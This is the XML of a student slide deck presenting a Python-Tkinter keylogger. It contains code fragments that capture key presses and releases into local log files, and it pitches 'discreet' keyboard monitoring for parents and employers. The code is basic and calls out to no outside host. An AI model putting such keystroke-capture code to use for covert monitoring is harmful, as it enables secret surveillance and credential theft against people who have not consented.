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E5F0AD-BCF6-4011-BFA2-1A4B8E36DA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B7ED353A-8B09-4E1F-A513-197CC3ED1A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779C622C-5673-4ABC-AEBB-182E141494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DCFC88-665A-4CDA-AA21-38D5C17756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216C7DF-0CA5-449F-B876-1FB2E153AF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ACE914CB-99AB-4956-B307-C0D98292E5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839C9AA-F54C-4BF7-88AC-B13047DEF0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71A3D4AB-56F7-47D5-AF82-62AACF143E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CB32AA68-67AB-4301-A3DF-B8C9719691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35EFE8A9-E95F-4B39-9AF1-85F7494FE9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446400" y="3085920"/>
            <a:ext cx="11298600" cy="33379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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi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A7C08FB-F5B5-471F-8DA0-7D3EBC1E64F0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the outline text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="13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Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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8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 w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447840" y="601200"/>
            <a:ext cx="3682440" cy="58150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67880" y="933480"/>
            <a:ext cx="3031560" cy="172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 cap="all">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style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901040" y="1179720"/>
            <a:ext cx="6650640" cy="465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chemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to 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Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Second level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Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Third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Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fourth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Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Fifth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67880" y="2836800"/>
            <a:ext cx="3031560" cy="300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1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Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click to edit Master text styles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dt" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606080" y="645696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ftr" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="64526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sldNum" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10558440" y="645696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91870A2-E90B-412F-B5C9-6FFDBC7E3286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9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 w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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 cap="all">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Click to edit Master title style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47840" y="641520"/>
            <a:ext cx="11290320" cy="365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Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Click icon to add picture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81040" y="5259960"/>
            <a:ext cx="11029320" cy="99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1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Master text styles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dt" idx="29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ftr" idx="30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sldNum" idx="31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2CB4E8-D2EE-4887-B86E-9117915B54B2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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi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81040" y="1415160"/>
            <a:ext cx="11029320" cy="457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Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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Second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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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4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5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6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22EA19C-F54D-40AA-A7EC-0D894E27598F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 hidden="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Rectangle 9" hidden="1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Rectangle 10" hidden="1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4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 w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8058240" y="599760"/>
            <a:ext cx="3687120" cy="58165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04040" y="863640"/>
            <a:ext cx="3123720" cy="480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Franklin Gothic Demi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75080" y="863640"/>
            <a:ext cx="7161120" cy="480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Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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Second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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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28" name="Rectangle 7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Rectangle 9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7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8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9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1B4AB3-ADE0-48F1-BC09-43B63920CEBF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7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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi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Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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Second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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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10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6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 w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447840" y="5141880"/>
            <a:ext cx="11290680" cy="12585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81040" y="2394000"/>
            <a:ext cx="11029320" cy="214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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi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 cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book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11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 idx="12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 idx="13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DA2CC49-5579-45C9-B210-1D6AFA5B43AF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6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729720"/>
            <a:ext cx="11029320" cy="49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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi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81040" y="1391400"/>
            <a:ext cx="5194440" cy="446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Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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Second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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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415920" y="1391400"/>
            <a:ext cx="5194440" cy="446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Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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Second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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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14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15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16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C31DB4E-B6A6-4552-AEE8-5F35162A516E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9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 w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi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81040" y="2250720"/>
            <a:ext cx="5194440" cy="55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81040" y="2926080"/>
            <a:ext cx="5194440" cy="293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Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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Second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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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415920" y="2250720"/>
            <a:ext cx="5194440" cy="55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415920" y="2926080"/>
            <a:ext cx="5194440" cy="293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Master text styles</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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Second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Fourth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Fifth level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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dt" idx="17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ftr" idx="18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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="19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6EF8F7-E488-4F85-9971-E362266DD8CE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1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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Demi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20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21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22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579841-EC4B-411C-8ED5-EFB559C0D509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the outline text format</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="17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Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="13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Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="11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1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dt" idx="23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ftr" idx="24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25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2EC567-FC45-48D1-9F0B-B709572FFDA6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techtrainer20/TNSDC" TargetMode="External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359000" y="1821600"/>
            <a:ext cx="9143640" cy="97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pc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="36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17" name="TextBox 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-329760" y="1034280"/>
            <a:ext cx="12726360" cy="5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32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Box 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117600" y="4586400"/>
            <a:ext cx="797976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1. Sreeni S -Dmi College of Engineering-CSE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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment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296640" y="-42696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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries: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7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42" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535560" y="1640880"/>
            <a:ext cx="5608080" cy="47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# Define the start_keylogger function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def start_keylogger():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global listener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listener = keyboard.Listener(on_press=on_press, on_release=on_release)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listener.start()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label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")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start_button.config(state='disabled')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stop_button.config(state='normal')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# Define the stop_keylogger function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def stop_keylogger():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global listener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listener.stop()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label.config(text="Keylogger stopped.")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start_button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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Result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pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Content Placeholder 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384560" y="1719000"/>
            <a:ext cx="2990880" cy="34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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Result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pic>
        <p:nvPicPr>
          <p:cNvPr id="146" name="Content Placeholder 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904320" y="1692720"/>
            <a:ext cx="7487280" cy="75240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6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720720" y="3458160"/>
            <a:ext cx="11250000" cy="156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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Conclusion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70680" y="144720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74151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>In conclusion, the development of an advanced Python-Tkinter based keylogger application represents a significant step forward in keyboard activity monitoring.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74151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>By prioritizing user experience, security, and ethical considerations, our keylogger offers a comprehensive solution for enhancing security and accountability in various contexts. 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74151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>With its intuitive GUI, robust encryption, and real-time logging capabilities, our keylogger sets a new standard for monitoring software, empowering users with greater control and peace of mind. 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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="162000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306000" indent="-30600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Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Integration with AI and Machine Learning: Explore the integration of AI and machine learning algorithms to analyze keyboard activity patterns and detect anomalies, further enhancing the keylogger's ability to identify potential security threats.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306000" indent="-30600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Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Cloud Integration: Implement cloud-based storage and synchronization capabilities, enabling users to securely access and manage keylogging data from anywhere, at any time.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306000" indent="-30600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Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Multi-Platform Support: Extend the keylogger's compatibility to additional platforms such as mobile devices and cloud-based environments, ensuring seamless monitoring across diverse computing environments.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306000" indent="-30600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Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Behavioral Analysis: Incorporate advanced behavioral analysis techniques to identify patterns and trends in keyboard activity, providing users with valuable insights for proactive security measures.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51" name="Title 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535680" y="844560"/>
            <a:ext cx="110293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 fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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</a:rPr>
              <a:t>Future scope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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>References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5280" indent="-305280" defTabSz="45720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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="24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hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC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2.https://www.bing.com/ck/a?!&amp;&amp;p=1f4ad54fbd8b6758JmltdHM9MTcxMTg0MzIwMCZpZ3VpZD0wY2FkZjU2My03YjRjLTZiMTctMzU4Ny1lNmJmN2E5ZTZhOTcmaW5zaWQ9NTUyOA&amp;ptn=3&amp;ver=2&amp;hsh=3&amp;fclid=0cadf563-7b4c-6b17-3587-e6bf7a9e6a97&amp;psq=keyloggrs&amp;u=a1aHR0cHM6Ly93d3cuZ2Vla3Nmb3JnZWVrcy5vcmcvaW50cm9kdWN0aW9uLXRvLWtleWxvZ2dlcnMv&amp;ntb=1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463040" y="2766240"/>
            <a:ext cx="92984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2800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>THANK YOU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49600" y="55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800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>OUTLINE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86440" y="1618920"/>
            <a:ext cx="11018520" cy="523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  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Problem Statement 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Proposed Solution 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System </a:t>
            </a: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Development Approach</a:t>
            </a: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 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Algorithm &amp; Deployment  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Result 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Conclusion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Future Scope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References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7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4983" lnSpcReduction="10000"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</a:rPr>
              <a:t>Problem Statement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81040" y="70200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lvl="1" marL="6292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1" marL="629280" indent="-3052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74151"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In today's digital landscape, ensuring the security and accountability of online activities is of paramount importance. However, existing methods for monitoring keyboard activity lack the necessary sophistication and user-friendliness. Thus, there is a pressing need to develop an advanced keylogger solution that offers comprehensive monitoring capabilities while maintaining user privacy and ethical standards. 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lvl="1" marL="6292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4983" lnSpcReduction="10000"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</a:rPr>
              <a:t>Proposed Solution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78880" y="1440000"/>
            <a:ext cx="11613240" cy="556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US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>To fulfill the need for discreet keyboard activity monitoring in today's digitally driven environment, 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306000" indent="-30600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Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>We propose the development of a cutting-edge Python-Tkinter based keylogger application equipped with advanced features to address the shortcomings of existing solutions. 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306000" indent="-30600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Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>This keylogger will discreetly capture keyboard events, including key presses, releases, and holds, providing real-time logging capabilities.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306000" indent="-30600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Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Additionally, it will offer an intuitive GUI for seamless control and configuration, along with robust data encryption to protect user privacy.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306000" indent="-30600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Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>By prioritizing user experience and ethical considerations, our keylogger aims to revolutionize keyboard activity monitoring for scenarios such as parental oversight and employee management.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306000"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7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81040" y="6624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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>System  Approach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80000" y="1800000"/>
            <a:ext cx="1206000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IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0f0f0f"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>	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27" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326160" y="1079280"/>
            <a:ext cx="11228040" cy="57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198360" bIns="19836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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger: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374151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4151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Requirement Analysis: Understand stakeholder needs, such as parents and employers,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374151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4151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>and define keylogger requirements.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374151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4151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Design: Develop the keylogger's functionalities, user interface, and data handling mechanisms.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374151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4151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implementation: Code the keylogger using Python and Tkinter, and conduct rigorous testing.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374151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4151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Deployment: Create installation packages, configure settings, and provide comprehensive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374151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4151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>documentation.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374151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4151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Maintenance: Monitor performance, provide updates, offer user support, and ensure adherence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374151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4151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>to ethical standards and regulations.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374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment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80880" y="47700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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries: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7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>
            <a:off x="1767600" y="2813760"/>
            <a:ext cx="8087400" cy="152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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment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218520" y="-43128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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Create GUI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7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pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Picture 5" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1745280"/>
            <a:ext cx="10954800" cy="466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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment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296640" y="-42696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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries: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7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36" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535560" y="1640880"/>
            <a:ext cx="5608080" cy="55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# Initialize the variables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keys_used = []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flag = False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keys = ""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# Define the on_press function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def on_press(key):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global flag, keys_used, keys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if flag == False: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keys_used.append(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    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{'Pressed': f'{key}'}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flag = True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if flag == True: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keys_used.append(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    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{'Held': f'{key}'}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4983" lnSpcReduction="10000"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  <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment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296640" y="-42696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374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries: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700" spc="-1" strike="noStrike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39" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535560" y="1640880"/>
            <a:ext cx="560808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# Define the on_release function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def on_release(key):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global flag, keys_used, keys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keys_used.append(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{'Released': f'{key}'}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if flag == True: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flag = False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keys = keys + str(key)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# Define the generate_json_file function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def generate_json_file(keys_used):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with open('key_log.json', '+wb') as key_log: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key_list_bytes = json.dumps(keys_used).encode()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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>key_log.write(key_list_bytes)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24</TotalTime>
  <Application>LibreOffice/24.2.2.2$Windows_X86_64 LibreOffice_project/d56cc158d8a96260b836f100ef4b4ef25d6f1a01</Application>
  <AppVersion>15.0000</AppVersion>
  <Words>1020</Words>
  <Paragraphs>107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2021-05-26T16:50:10Z</dcterms:created>
  <dc:creator>Vaibhav Ostwal</dc:creator>
  <dc:description/>
  <dc:language>en-IN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-04T20:07:22Z</dcterms:modified>
  <cp:revision>26</cp:revision>
  <dc:subject/>
  <dc:title>SkillsBuild Partner Update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PresentationFormat">
    <vt:lpwstr>Widescreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Slides">
    <vt:i4>16</vt:i4>
  </property>
</Properties>
</file>